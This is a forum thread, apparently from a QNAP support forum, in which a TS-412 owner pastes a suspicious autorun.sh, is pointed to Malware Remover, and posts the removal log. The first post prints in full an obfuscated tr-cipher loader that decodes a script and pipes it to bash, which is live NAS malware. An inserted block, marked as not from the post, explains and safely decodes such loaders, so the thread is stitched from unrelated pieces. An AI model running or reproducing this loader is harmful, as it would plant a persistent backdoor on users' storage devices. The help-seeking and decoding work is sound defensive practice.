Suspect I have a virus/malware on TS-412. How do I remove?

zxlife
Starting out
Posts: 45
Joined: Wed Jul 11, 2012 10:15 pm

Suspect I have a virus/malware on TS-412. How do I remove?

Post by zxlife »

Hi,
I have a TS-412 running RAID5 on 4 x 2TB WD RED drives.

Despite the CPU and RAM not showing much activity, I'm thinking I've got some malware infection because:
- logging into the NAS drive via the web interface takes ages (e.g. over a minute to get the login page to actually appear)
- if/when I do manage to log in I often get the "The Server is busy..." message before being able to navigate anywhere
- opening App Center has taken over 15 minutes at times.
- I've seen two QPKG files with random names on it
- Opening a shell with PuTTY takes 20-30 seconds for the login prompt to appear, and 20-30 seconds between each prompt/command
- I've no idea what a typical autorun.sh file should look like, but mine looks like this (after mounting it with mount -t ext2 /dev/mtdblock5 /tmp/config; see the end of this message):

I've closed my external ports but I can't even do anything with the device because it is so unresponsive. Can anyone advise my next steps?

Thanks
Chris

Code:

PgfHXAc=${RIpzmnHUUoKf}${MFQtAc}tr; QFKTlU=$CyAxhoUXgonetX$""\\$jKCbTyQuUtflIF$""; IrUIIq=${TUrOiGRrytia}${NWJUvOFBpTvX}${QFKTlU}1${JMRAtueqaSkr}33${AskChz}; hTMuqJ=${eSkQYtRTpCxj}${AGnyQkaQoEGI}${QFKTlU}0${jrDUClplPvuP}55${BtfTtf}; mUFKAJof=${QsOmYBStoRvv}${sbizinUMSIvH}${QFKTlU}1${uILiITXcrcdO}34${qZpdjz}; $PgfHXAc 'qLkPUEcA% '$mUFKAJof'fGnFsZ+|I&a>D}ui";rv'"'"'joTY*]BW'$IrUIIq'mN\nx)VwSlM`He({b$pXCyJh<R#=zK'$hTMuqJ'!OtdgQ' ' KzG%)h\n!e"`anX'$IrUIIq'cTE'$mUFKAJof'ldVS*DC'$hTMuqJ'BWxsw$JNp]iot'"'"'YmZ|vQquF#OgLjA+>=}U{(HfP;krR&y<IbM'<<"meFBnLga"|b${HjmyHT}a${NvSxAcHlLrQfhyh}s${rEFdq}h
`%/gBn/'cAAWwY bdYXoJLiTxZS{K<|C[KAN-anWxX\II\A'Tu*#<N
XoJF[#>rGGCoJN-anWxC13oJ&<WnSwuDx{C3AbiekbYXoJr-xSrlOCoJN-anWxC05oJLb*#WVju||C5Az>b
y y+XoJT(FrlvHCoJN-anWxC13oJjwiODrR&+dC4AoWwY bdYqmU]Wt<hv
=>!cd{|NFQwESZ$%kD[Inp;n}X(b'i&r*G#mobiekbYmHm\m\ml)\aMOC yqmo'Tu*#<N
mfzRxB+-juJLKVmoz>b
y y+mT`YgoPemqm;$p}v[\h=ajF&|!tX{#<gmo'Tu*#<N
mZq%eRD*YC'V(Hm\m\m)WuidIncwUnyP-kxJKoLl+]>zmobiekbYmSMf`G
NTQrmoz>b
y y+mb BEOmtt\ Q |>\)oJwy-QeZwnCgG'oJSZ&aCcAuk/Sol/}"#g<p& h%wYfEFvyCwYfEn:/Sol:/}Sol:/s} /Sol:/s} /}Sol:/s} /Sol/c11:/s} /d&$Jd/}Sol:/s} /d&$Jd/Solv#$&LLJl>%BX%>o lJLg%W/>gX/lsdd%2W|1%ii%>o lJLg%
P%C%hg}h%BM%vy1v%||%g$"&%v.v%||% ghs l=%d&$Jd% FvyC1mvyC1uutZk/znvnv=%$J}g%y %ol%/tZk/zt/tiZk/zt/tP% FvyC m/tnv=%g$"&%vyC mvyC uutZk/znvnv==%t/tP%g$"&%yC mmZk/zn==%vvP%g$"&%y1==%tP%g$"&%.==%g}J$=%n#hg}h%B>%/gh$/$&l[oD%||%$&l[>o F/gh$/$&l[oD%ii%C%hg}h%B>%/Llh/ErY_abbf/.$&l[oD%||%$&l[>o F/Llh/ErY_abbf/.$&l[oD=%n#$&LLJl>%BX%Dgh$[D%W%/>gX/lsdd%2W|1%ii%Dgh$[D%
P%C%}g>%Bl%'E=yC<=}/`
.t`#`Z'vyC1//`//```/nv'z`i^`Z'vyC1//`//```/nv'z`P`#//G=}/`
^`i`#`P`ZZ^`#z`]`z`#.t//pn'%vyC4:ByC$&l[>o n/s(ols<.$&l[nv%i%}g>%Bl%'}/^'vyC2//`//```/nv'%`?F%`?`
.t`P/`1/Gp'=%n#S>o F#hg}h%B[%vyC$&l[>o n/}LS.$&l[v%||%[& %o%ol%"&Lg}%wsSdo$%r&!ld&J>%IsdhoLg>oJ%TgS%ag$& >olD}=%>&%S>o FjDgh$[D%vyov%pJh"%B[%vyC$&l[>o n/}LS.$&l[vj%||%hg}h%k%BM%vyS>o v%||%S>o Fj>o lJLg%vyS>o vj%||%hg}h%B>%vyS>o v%||%hg}h! ohgJSdgFy
LxhgLp%vyCS>o n/.hLp.ccccccvP%||% L%vyChg}h! ohgJSdgnv%||%S gJx=%S>o F''=%>&lg#hg}h%BM%vyCS>o nv%ii%hg}h%k%B>%vyCS>o nv%||%C%$&LLJl>%BX% gJ>dolx%W/>gX/lsdd%2W|1%ii%dl%B}[%/Sol/Ss}eS&<%/s} /Sol/ gJ>dolx=%[& %o%ol%"&Lg}%wsSdo$%r&!ld&J>%IsdhoLg>oJ%TgS%ag$& >olD}=%>&%S>o Fj gJ>dolx%v/}"J g/yConv%2W/>gX/lsddj%||%hg}h%k%BM%vyS>o v%||%S>o Fj>o lJLg%vyS>o vj%||%S>o F/}"J g/yCS>o uut/n%||%hg}h%B>%vyS>o v%||%S gJx=%>&lg=#hg}h%BM%vyCS>o nv%ii%hg}h%k%B>%vyCS>o nv=%n%||%C%S>o FjDgh$[D%AEYa{_r{-%>g[R&dIw%B[%vyC$&l[>o n/>g[_}"J g.ol[&vj#hg}h%BM%vyCS>o nv%ii%hg}h%k%B>%vyCS>o nv=%n%||%C%S>o FjL&slh%i%}g>%Bl%v}/.t`
`/}"J g`/Z^%/z`]`P%.t/`1/Dpv%i%"gJ>%Bl%1j#hg}h%BM%vyCS>o nv%ii%hg}h%k%B>%vyCS>o nv=%n%||%C%[& %o%ol%*Y*E{r{R3_rYfY%*Y*E{r{R2_rYfY%*Y*E{r{R1_rYfY%Ir0_rYfY=%>&%hg}h%B>%v/}"J g/yConv%||%S>o Fv/}"J g/yConv%||%S gJx=%>&lg=#hg}h%BM%vyCS>o nv%ii%hg}h%k%B>%vyCS>o nv%||%S>o F/Llh/ErY_abbf=%n#J $"_&FjslJLg%BL%i%D gp%Bo%v<86`ioZ3B6z86v%W%/>gX/lsdd%||%g$"&%<86%ii%g$"&%J Lj#splpSolFy
g$"&%Tjg$"&%Blg%v``<73``<6Jvjewjg$"&%Blg%v``<63``<78``<6Jvj}cjg$"&%Blg%v``<69``<65``<6>vj%i%h %vUK\h EXlSqr *bxA{wIoY"Y}v%vlOAw(rG{c<G cp!* )OsErV vP#$DoFy
g$"&%J[jg$"&%Blg%v``<6>``<6S``<75vjcjg$"&%Blg%v``<70``<69vj%i%h %vJc+}!R;w[>e(dR$rTISGE{v%v\XMKII$-Iqb;f<pUS>x}lwvP#}}"SolFy
g$"&%Mjg$"&%Blg%v``<74``<63vjfRjg$"&%Blg%v``<6J``<65``<6Svj%i%h %vE T)SSw-;-p*flQgw[H+O}xR}v%v"SpI}KIYV)(l(LDLe*J<o$)J&vP#}}""xgeFy
g$"&%&&Djg$"&%Blg%v``<6[``<65``<66``<74vjlHdjg$"&%Blg%v``<69``<75``<61``<68vjxAfjg$"&%Blg%v``<66``<70``<6>``<71vj%i%h %vR}}S>OfQ*gSl!+JQsgXM&v%v-+QD;Qcb$hYh*V*&Rgd"<vP#}}"Jsh"Fy
g$"&%Ijg$"&%Blg%v``<61``<67vjoGpjg$"&%Blg%v``<67``<69``<6S``<6$vj%i%h %v((GL[acU$*}wV\ogEsa->Jv%vI>e\)c T.s>YQ"Qxa&Gb(HvP#}}"$&l[Fy
g$"&%sjg$"&%Blg%v``<64``<7JvjKjg$"&%Blg%v``<77``<6gvj%i%h %v&f+M"hRKwIQcJSHhc-L"v%v&JQl>sdUMSAg)UsxJ$-OvP#J $"J LFy
g$"&%-(jg$"&%Blg%v``<66``<62``<69vj Sbjg$"&%Blg%v``<6>``<76``<76``<76vjHjg$"&%Blg%v``<68``<6[vj%i%h %vSI[gd(wDUM$<!cSL*(&;Udv%vcg+h){S>lLQOcAggUqQIRIvP#J $"<86Fy
g$"&%f()jg$"&%Blg%v``<65``<75``<78``<67vj*"jg$"&%Blg%v``<6J``<77``<6>vjA&;jg$"&%Blg%v``<69``<6S``<69``<65vj%i%h %v;X+JSRx}"DdRaseA$"D"ohwv%vXx>J!(qXs !bpe.)!GrV"{lvP#opJh"Fy
g$"&%J>jg$"&%Blg%v``<75``<6$``<63vjGojg$"&%Blg%v``<6J``<69``<7Jvj;& jg$"&%Blg%v``<7J``<6J``<73``<78vj%i%h %vw<d{rs>E+")b{S}eep}Ev%vHbQ d<!U}fbIAqp+XR-.vP#$ &l}Fy
g$"&%{SXjg$"&%Blg%v``<74``<65``<6J``<61vjMMxjg$"&%Blg%v``<77``<61``<6J``<72vj.)jg$"&%Blg%v``<67``<69``<73vj%i%h %vTfolRSQ+a >s)RxQhSlRM;-v%vfTeV(&axdED[I.Yf&.p\MEovP#J $"FjslJLg%BL%i%D gp%Bo%v<86`ioZ3B6z86v%W%/>gX/lsdd%||%g$"&%vyJ $"<86v%ii%g$"&%vyJ $"J Lvj#hg}h%B[%v./yCJ $"nv%||%}>o Fjp!>j%ii%C%hg}h%vyCUYAE_Ab)a*{Z0znv%||%}>o Fy
%$>%vy
%>o lJLg%vyCUYAE_Ab)a*{Z0znv%Pv%||%p!>%P%ii%C%hg}h%vyC0nv%||%}>o Fy
%$>%vy
%>o lJLg%vyC0nv%Pv%||%p!>%P=%n%||%hg}h%B[%vyC}>o n/yCJ $"nv%||%$>%vyC}>o nv=%n%ii%C%hg}h%B[%v/hLp/$&l[oD/yCJ $"nv%||%$>%/hLp/$&l[oD=%n%ii%C#L>o Fy
LxhgLp%B>%/hLp/.L&slh.ccccccP%ii%C%L>o F/hLp/.L&slh.QSS<H&S=%Lx>o %yCL>o n=%n#__Ubbf_r{RF#__L&>gdFjDgh$[D%Ae}hgL%vGlhg lJd%I&>gdvj#*b;-G\_r{R_;br{FjDgh$[D%v*b;-G\%AfbaY\{v%r{RG*{_;br{%B[%/gh$/pdJh[& L.$&l[j#*b;-G\_r{R_wYafFjDgh$[D%v*b;-G\%AfbaY\{v%-A_Y*fGR{_wYafGfGb;%B[%/gh$/pdJh[& L.$&l[j#*b;-G\_r{R_-AFjDgh$[D%v*b;-G\%AfbaY\{v%-A_fKw{%B[%/gh$/pdJh[& L.$&l[j#__Ubbf_*b;-Fjhg}h%B[%/gh$/>g[Jsdh_$&l[oD/Ubbf.$&l[%||%$Jh%/gh$/>g[Jsdh_$&l[oD/Ubbf.$&l[%2W/>gX/lsdd%ii%$Jh%vyC$&l[>o n/Ubbf.$&l[vj%ii%C%hg}h%vyJ $"_&v%F%J L%||%__Ubbf_*b;-FfAB;YAYaI=%n%#$&LLJl>%BX%"Jd_Jpp%W%/>gX/lsdd%2W|1%||%C%__Ubbf_r{RFy
"Jd_Jpp%BBDgh_S&&h_p>%p& h_o>F0P=%n#hg}h%vyC__Ubbf_*b;-nv%F%fAB;YAYaI%ii%hg}h%vyJ $"_&v%F%J L%||%C%hg}h%B[%/gh$/GA_fYA%||%__Ubbf_r{RFvyC__Ubbf_r{R:B/>gX/Lh>Sd&$xn7v%ii%__Ubbf_r{RFvyC__Ubbf_r{R:B/>gX/Lh>Sd&$xn5v=%n%ii%__Ubbf_r{RFvyC__Ubbf_r{R:B/>gX/}><n6v#hg}h%v<yC*b;-G\_r{R_;br{nv%kF%v<v%||%C%sSoJhhJ$"%BL%vyC*b;-G\_r{R_wYafnv%B>%2=%L&slh%Bh%sSo[}%sSo2:$&l[oD%vyCL>o nv%W%/>gX/lsdd%2W|1%ii%C%hg}h%B[%/gh$/GA_fYA%||%L&slh%Bh%g<h4%/>gX/LL$Sdx0p7%vyCL>o nv=%n%n%ii%L&slh%yC__Ubbf_r{Rn%Bh%g<h2%yCL>o n%ii%C%hg}h%vyC__L&>gdnv%F%vfAB201v%||%L&slh%Bh%g<h2%/>gX/Lh>Sd&$x4%yCL>o n=%n%ii%C%sSoJhhJ$"%BL%vyC*b;-G\_r{R_wYafnv%B>%2=%L&slh%Bh%sSo[}%sSo2:$&l[oD%vyCL>o nv=%L&slh%Bh%g<h4%/>gX/LL$Sdx0p7%vyCL>o nv=%n%ii%C%hg}h%vyC__L&>gdnv%F%vfAB269(v%||%L&slh%Bh%g<h2%/>gX/}>$6%yCL>o n=%n%ii%C%hg}h%vyC__L&>gdnv%F%vfAB869v%||%L&slh%Bh%g<h2%/>gX/}>o6%yCL>o n=%n%ii%C%hg}h%vyJ $"_&v%F%J L%ii%yC__Ubbf_*b;-n%F%vfAB;YAYaIv%||%C%[& %o%ol%5%7%4%6%3%8=%>&%L&slh%Bh%g<h2%v/>gX/Lh>Sd&$xyConv%yCL>o n%||%S gJx=%>&lg=%n=%n%ii%C%hg}h%vyJ $"_&v%F%<86%||%[& %l%ol%/>gX/}>$%/>gX/}><%/>gX/}>o%y__Ubbf_r{R=%>&%[& %o%ol%6%y*b;-G\_r{R_wYaf=%>&%L&slh%Bh%g<h2%yClnyCon%yCL>o n%||%S gJx%2=%>&lg=%>&lg=%n%ii%C%L&slh%Bh%g<h2%y
/}Sol/"Jd_Jpp%BBDgh_S&&h_p>%p& h_o>F0P6%yCL>o n=%n=%n#[& %[odg%ol%vyC}}"Solnv%vyCsplpSolnv%v.v=%>&%hg}h%B[%vyCS>o n/.yCopJh"n/yC[odgnv%ii%S gJx=%>&lg#hg}h%vy[odgv%kF%v.v%ii%hg}h%k%B[%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v%||%C%hg}h%B}%.Ubbf_fGI{%||% gJ>%B %S&&hhoLg%N%.Ubbf_fGI{%ii%g$"&%j>Jhg%]m}j%W%.Ubbf_fGI{=%hg}h%B}%vyCS>o n/.Ubbf_fGI{v%||% gJ>%B %S&&hhoLg%N%vyCS>o n/.Ubbf_fGI{v%ii%g$"&%j>Jhg%]m}j%W%vyCS>o n/.Ubbf_fGI{v=%hg}h%vyS&&hhoLgv%ii%C% gJ>%B %S&&hhoLg%N%.Ubbf_fGI{=%hg}h%B}%vyCS>o n/.Ubbf_fGI{v%||% gJ>%B %S&&hhoLg%N%vyCS>o n/.Ubbf_fGI{v=%n=%hg}h%vyS&&hhoLgv%||%C%}dggp%2=%Z%yS&&hhoLg%BDh%0%z%||%gFy

%j>Jhg%]m}j%B%yS&&hhoLg%PP%||%Z%yg%BDh%0%z%||%Z%yg%Bdh%1296000%z%||%C%hg}h%vyL>o v%||%hg}h%Bg%vyCL>o nv%||%C%$>%/=%}"%B$%v}dggp%5=%sL&slh%yCL>o n=% L>o %yCL>o nv%|%n=%l&g<F1=%n=%n=%n#hg}h%vyl&g<v%F%1%ii%C# L%vyCS>o n/.Ubbf_fGI{v# L%.Ubbf_fGI{#hg}h%k%B[%v./yCJ $"nv%||%hg}h%B>%vyCL>o nv%||%hg}h%B[%vyCL>o n/yCJ $"nv%||%$>%vyCL>o nv#h>o FjLxhgLp%B>%vyCS>o n/.hgLp.ccccccv%ii%LxhgLp%B>%v/}"J g/wsSdo$/.hgLp.ccccccv%ii%LxhgLp%B>%v/Llh/ErY_abbf/.hgLp.ccccccvj#hg}h%B>%vyh>o v%ii%C%[& %o%ol%vyS>o v%v/}"J g/wsSdo$v%v/Llh/ErY_abbfv=%>&%Lx>o %vyCon/.hgLp.QSS<H&Sv%W%/>gX/lsdd%2W|1%||%hg}h%B>%vyCon/.hgLp.QSS<H&Sv%||%h>o FvyCon/.hgLp.QSS<H&Sv=%>&lg=#hg}h%B>%vyh>o v=%n%ii%C%h>o FjLxhgLp%B>%/hLp/.hgLp.ccccccj%||%hg}h%B>%vyh>o v=%n%ii%C%Lx>o %v/hLp/.hgLp.QSS<H&Sv%||%h>o F/hLp/.hgLp.QSS<H&S%||%hg}h%B>%vyh>o v=%n%ii%C%h>o FjLxhgLp%B>%.ccccccj%||%hg}h%B>%vyh>o v=%n%ii%C%Lx>o %v.QSS<H&Sv%||%h>o Fv.QSS<H&Sv%||%hg}h%B>%vyh>o v=%n%ii%h>o Fjp!>j#$p%vyCJ $"nv%yCh>o n#$>%yCh>o n#hJ %B<M[%vyCJ $"nv#D gp%B-%''%NN{b-%W/>gX/lsdd%2W|1%||%[D gpFvD gp%B-v%ii%C%$&LLJl>%BX%[D gp%W/>gX/lsdd%2W|1%||%[D gpF[D gp%ii%[D gpFD gp=%n##{b-#hg}h%vy[D gpv%ii%[D gpFD gp##hg}h%B>%vyCS>o n/.yCopJh"nv%ii%Lx>o %Bp%vyCS>o n/.yCopJh"nv%ii%Lx>o %vyCS>o n/.yCopJh"nv##hg}h%B[%vy$Dov%||%$"L&>%755%vy$Dov%||%v./yC$Donv##hg}h%B[%/hLp/+pxD.$&l[.SJx%||%C%h&s$"%B$ %/hLp/+pxD.$&l[.SJx%vyC$&l[>o n/+pxD.$&l[v=% L%/hLp/+pxD.$&l[.SJx=%n##$p%Bp%yC$ &l}n%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v%ii%C%$p%yC$ &l}n%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v=%h&s$"%B$ %/Sol/Ss}eS&<%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v=%n##$"L&>%755%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v##o[%Z%B[%vyC$&l[>o n/$ &lhJSv%z=%h"gl#hg}h%vyaY;rbIv%ii%aY;rbIF12499#hg}h%y

%yaY;rbI%|%1%PP%F%0%||%}pJ$gF'%'%ii%}pJ$gF''#$ &lLol}Fvy

%yaY;rbI%m%4%PPv#hg}h%k%vy$ &lLol}v%Bg+%0%||%$ &lLol}FvyC$ &lLol}n0v%#y[D gp%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v%vyC$&l[>o n/$ &lhJSv%W/>gX/lsdd%2W|1%ii%C%dFy

%
j!$%Bd%N%vyC$&l[>o n/$ &lhJSvj%/%3P%]%1PP=%hg}h%vydv%BDh%0%||%}g>%Bo%vyCdnv'o'vy$ &lLol}v'%t%t%t%t%'vyCS>o n/.yCopJh"n/yC$ &l}n.}"v'%W'vy}pJ$gv'/>gX/lsdd%2W|1'%vyC$&l[>o n/$ &lhJSv%ii%g$"&%vy$ &lLol}v'%t%t%t%t%'vyCS>o n/.yCopJh"n/yC$ &l}n.}"v'%W'vy}pJ$gv'/>gX/lsdd%2W|1v'%WW%vyC$&l[>o n/$ &lhJSv%||%/gh$/oloh.>/$ &l>.}"% g}hJ h%W%/>gX/lsdd%2W|1%||%h&s$"%B$ %yC$&l[>o n/JpJ$"g%yC$&l[>o n/$ &lhJS=%n#[o##[& %[odg%ol%vyC}}"Solnv%vyCsplpSolnv=%>&%hg}h%B[%vyCS>o n/.yCopJh"n/yC[odgnv%ii%$p%Bp%vyC[odgnv%vyCS>o n/.yCopJh"n/yC[odgnv%ii%C%$p%vyC[odgnv%vyCS>o n/.yCopJh"n/yC[odgnv=%h&s$"%B$ %/Sol/Ss}eS&<%vyCS>o n/.yCopJh"n/yC[odgnv=%n%>&lg#$"L&>%755%vyCS>o n/.yCopJh"n/yC}}"Solnv#$"L&>%755%vyCS>o n/.yCopJh"n/yCsplpSolnv##D gp%'J>Lol:`y1`y`y*&{aD7elQK(}Q2Q4DdV34`.:'%/gh$/}"J>&!%W/>gX/lsdd%2W|1%||%C#k%hg}h%B>%vyCS>o n/.d&Dv%||%Lx>o %vyCS>o n/.d&Dv#k%hg}h%B[%/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do%||%C%$p%Bp%/"&Lg/"hhp>/$DoBSol/Jsh"(&Dol.$Do%/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do%ii%$p%/"&Lg/"hhp>/$DoBSol/Jsh"(&Dol.$Do%/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do=%n%||%g$"&%'uk/Sol/}"#wbAfrYfYFvv#hg}h%v<yCa{H){Af_I{fEbrnv%F%<wbAf%||%C%#$J}g%vyC*b;f{;f_({;\fEnv%ol%'v''v'%i%tZk0B9zt%i%0t%P%[Jd}g%==%tP%hg}h%vyC*b;f{;f_({;\fEnv%Bdh%2147483646%==%g}J$%||%C%G-AF% gJ>%B>%'v''v'%B l%vyC*b;f{;f_({;\fEnv%wbAfrYfY=%hg}h%BM%vywbAfrYfYv%||%wbAfrYfYFj>>%S}F1%$&slhFvy*b;f{;f_({;\fEv%2W/>gX/lsddj=%n%ii%hg}h%vywbAfrYfYv%ii%wbAfrYfYFj$Jhj%##hg}h%k%BM%vywbAfrYfYv%||%$J}g%vyCwbAfrYfYnv%ol%tp!>tP%hg}h%B[%v'yCS>o n'/.d&D/.$Do_d&Dv%ii%C%hg}h%B>%v'yCS>o n'/.d&Dv%ii%Lx>o %Bp%v'yCS>o n'/.d&Dv%||%h&s$"%v'yCS>o n'/.d&D/.$Do_d&Dv=%n%||%hg}h%y

j}hJh%B$%'v'v'm}'v'v'%v'yCS>o n'/.d&D/.$Do_d&DvjPP%Bdh%209715200%||%$Jh%WW%v'yCS>o n'/.d&D/.$Do_d&Dv%NN%{b-%==%g}J$=#ya{Ibf{_Yrra:ywbAfrYfY#{b-#n#hg}h%k%BM%vywbAfrYfYv%||%$J}g%vywbAfrYfYv%ol%ts}g FJ>Lolt%P%h sg%==%tP%[Jd}g%==%g}J$%ii%$J}g%vyH){aK_AfaG;\v%ol%ts}g FJ>LoltP%h sg%==%tP%[Jd}g%==%g}J$%||%C#$J}g%vyCa{Ibf{_Yrranv%ol%'v''v'%i%10.t%i%127.t%i%192.168.t%i%169.254.t%i%172.1Z6B9z.t%i%172.2Z0B9z.t%i%172.3Z01z.t%i%t:t%P%[Jd}g%==%tP%h sg%==%g}J$%||%D gp%'v'v'J>Lol:`y1`y`y*&{aD7elQK(}Q2Q4DdV34`.:'v'v'%/gh$/}"J>&!%W/>gX/lsdd%2W/>gX/lsdd%||%g<oh%0#n#o[%k%hg}h%BM%vywbAfrYfYv=%h"gl%#g<g$%BJ%vyC0nv%/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do%NN%R4q(rLK!X$#ywbAfrYfY#R4q(rLK!X$#gd}g#g<g$%BJ%vyC0nv%/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do#[o#g<oh%0'%W%/"&Lg/"hhp>/$DoBSol/_Jsh"(&Dol.$Do#hg}h%vy?v%F%0%||%hg}h%B}%/"&Lg/"hhp>/$DoBSol/_Jsh"(&Dol.$Do%||%hg}h%B}%/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do%||%LX%/"&Lg/"hhp>/$DoBSol/_Jsh"(&Dol.$Do%/"&Lg/"hhp>/$DoBSol/Jsh"(&Dol.$Do%||%$"L&>%755%/"&Lg/"hhp>/$DoBSol/Jsh"(&Dol.$Do%||%h&s$"%B$ %/"&Lg/"hhp>/$DoBSol/HfAJsh"(&Dol.$Do%/"&Lg/"hhp>/$DoBSol/Jsh"(&Dol.$Do#n##.%vyCS>o n/.yCopJh"n/yC$ &l}n.}"v#$>%vyC}>o nv# L%B [%vyCh>o nv#hg}h%vyL>o v%||%hg}h%B>%vyL>o v%||%C%$>%/=%}"%B$%v}dggp%5=%sL&slh%yCL>o n=% L>o %yCL>o nv%|%n%#h sg=#n###uA Q |>AA`
meFBnLga
QNAP TS-412 (4 x 2TB WD RED)
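What the pasted autorun.sh actually is, and how to read it without running it, as an added example (this is not code from the post or from QNAP). Every ${...} on the first line of the paste refers to a variable that is never assigned, so each expands to nothing: PgfHXAc is just tr, the QFKTlU/IrUIIq/hTMuqJ/mUFKAJof fragments build backslash-octal escapes (\133, \055, \134: the characters [, - and \) for tr's character sets, and b${HjmyHT}a${NvSxAcHlLrQfhyh}s${rEFdq}h is bash. The whole file is therefore tr 'SET1' 'SET2' <<"meFBnLga" | bash: a substitution-ciphered script that tr decodes and hands straight to a shell, which is why a one-line "config" script is this long. The script below assumes you are working on a copy of such a file on a separate analysis machine (never on the NAS), uses a constructed, harmless stand-in loader so it runs offline, and needs only sh, grep, sed, head, tail and tr.

```shell
#!/bin/sh
# Added example, not from the post or from QNAP. Reveals what a "tr ... <<DELIM | bash"
# loader such as the posted autorun.sh would hand to bash, without letting bash run it.
# Work on a COPY of the file on an analysis box, never on the NAS itself.

# Constructed benign stand-in for the real autorun.sh (same shape, harmless payload):
# ${a1} ${a2} ${q1} ${q2} ${q3} are never assigned, so line 1 is really
#   tr 'A-Za-z' 'N-ZA-Mn-za-m' <<"ENDMARK" | bash
# and the here-document is a rot13-encoded "echo" command.
make_sample() {
  cat > "$1" <<'EOF'
ZZ=${a1}${a2}tr; $ZZ 'A-Za-z' 'N-ZA-Mn-za-m' <<"ENDMARK"|b${q1}a${q2}s${q3}h
rpub "uryyb sebz gur ybnqre"
ENDMARK
EOF
}

# Heuristic triage: a genuine autorun.sh is a few readable lines. Many ${var} references
# plus a quoted here-document piped into something is the loader shape seen in the post.
autorun_looks_obfuscated() {
  refs=$(grep -o '\${[A-Za-z_][A-Za-z0-9_]*}' "$1" | wc -l | tr -d ' ')
  heredoc=$(grep -c '<<"[A-Za-z0-9_]*"|' "$1" || true)
  [ "$refs" -ge 5 ] && [ "$heredoc" -ge 1 ]
}

# Decode safely: keep line 1 (the variable setup and the tr command) but replace everything
# after the here-document operator, i.e. the pipe into the interpreter, with "| cat". Then
# run the rewritten copy, so tr's output is printed instead of executed. Read line 1 of a
# real sample first and confirm it holds nothing but assignments and the tr command.
reveal_payload() {
  src="$1"
  tmp="$src.reveal"
  head -n 1 "$src" | sed 's/\(<<"[A-Za-z0-9_]*"\).*$/\1 | cat/' > "$tmp"
  tail -n +2 "$src" >> "$tmp"
  sh "$tmp"
  rm -f "$tmp"
}
```

For the constructed sample, reveal_payload prints the decoded line echo "hello from the loader". On a real sample the rewrite is only safe when line 1 contains nothing but assignments and the tr command, as the posted one does; what the real payload does is not determined here, so decode a copy and read the output rather than guessing.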
Don
Guru
Posts: 12289
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Suspect I have a virus/malware on TS-412. How do I remove?

Post by Don »

Have you installed and run Malware Remover?
Use the forum search feature before posting.

Use RAID and external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced, and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.

NAS: TVS-882BR | F/W: 5.0.1.2346 | 40GB | 2 x 1TB M.2 SATA RAID 1 (System/VMs) | 3 x 1TB M.2 NVMe QM2-4P-384A RAID 5 (cache) | 5 x 14TB Exos HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-h674 | F/W: 5.0.1.2376 | 16GB | 3 x 18TB RAID 5
Apps: DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS3, Entware, DLstation, VS, +
zxlife
Starting out
Posts: 45
Joined: Wed Jul 11, 2012 10:15 pm

Re: Suspect I have a virus/malware on TS-412. How do I remove?

Post by zxlife »

It was a struggle to get it installed with the sluggish response but yes, I left it installing last night, and it eventually installed and started scanning. It's reported that malware was detected and removed and I am now prompted to reboot which I am doing now. I'll report back.
zxlife
Starting out
Posts: 45
Joined: Wed Jul 11, 2012 10:15 pm

Re: Suspect I have a virus/malware on TS-412. How do I remove?

Post by zxlife »

Okay. I removed most of my apps including the two suspect ones via App Centre and installed Malware Remover.
The server then proceeded to do a scan automatically once it was installed.
It identified and removed some malware and prompted for a reboot.
After doing the reboot, the NAS drive is MUCH more responsive and looks in much better shape.
Thanks for your advice.

I've included part of my syslog below for what the malware remover found:

Code:

Time	Content
02:56:24	[App Center] Music Station disabled.
02:58:12	[App Center] Photo Station disabled.
02:59:59	[App Center] Download Station disabled.
03:21:35	[myQNAPcloud] CloudLink service for myQNAPcloud web site is not available. You may not be able to manage or share the file(s)/folder(s) stored on this QNAP device via myQNAPcloud web site.
03:22:13	[myQNAPcloud] CloudLink service for myQNAPcloud web site is not available. You may not be able to manage or share the file(s)/folder(s) stored on this QNAP device via myQNAPcloud web site.
04:39:03	[App Center] Python3 removed.
04:40:09	[App Center] Video Station removed.
04:46:38	[App Center] IFTTT Agent removed.
04:52:25	[App Center] Photo Station removed.
05:00:37	[App Center] Download Station removed.
05:01:23	[App Center] wMGLOxwzFbe removed.
05:01:34	[App Center] Music Station removed.
05:02:30	[App Center] Media Streaming Add-on removed.
05:03:38	[App Center] Plex Media Server removed.
05:04:58	[App Center] Qsync Central removed.
05:06:21	[App Center] Installed Malware Remover 3.2.0 in /share/MD0_DATA/.qpkg/MalwareRemover.
05:07:27	[MalwareRemover] Started scanning.
05:07:41	[App Center] Enabled Malware Remover.
05:09:03	[MalwareRemover] The following malicious file/folder was found and removed: /tmp/.remover_3X8XQ0
05:09:24	[MalwareRemover] The following malicious file/folder was found and removed: /tmp/config//FKqeireOevvvQhj
05:09:43	[MalwareRemover] The following infected file/folder was found and recovered: /share/MD0_DATA/.kAImccZNHGwkec/.Tpfdvrj.sh
05:10:19	[MalwareRemover] The following infected file/folder was found and recovered: /share/MD0_DATA/.PgtlggqOktgFXgu/sdUookykBm.sh
05:10:36	[MalwareRemover] The following infected file/folder was found and recovered: /mnt/HDA_ROOT/.config/cups/XwDkvAdFejW
05:10:49	[MalwareRemover] The following malicious schedule was found and removed from the crontab: /share/MD0_DATA/.kAImccZNHGwkec/.Tpfdvrj.sh
05:10:53	[MalwareRemover] The following malicious schedule was found and removed from the crontab: /share/MD0_DATA/.PgtlggqOktgFXgu/sdUookykBm.sh
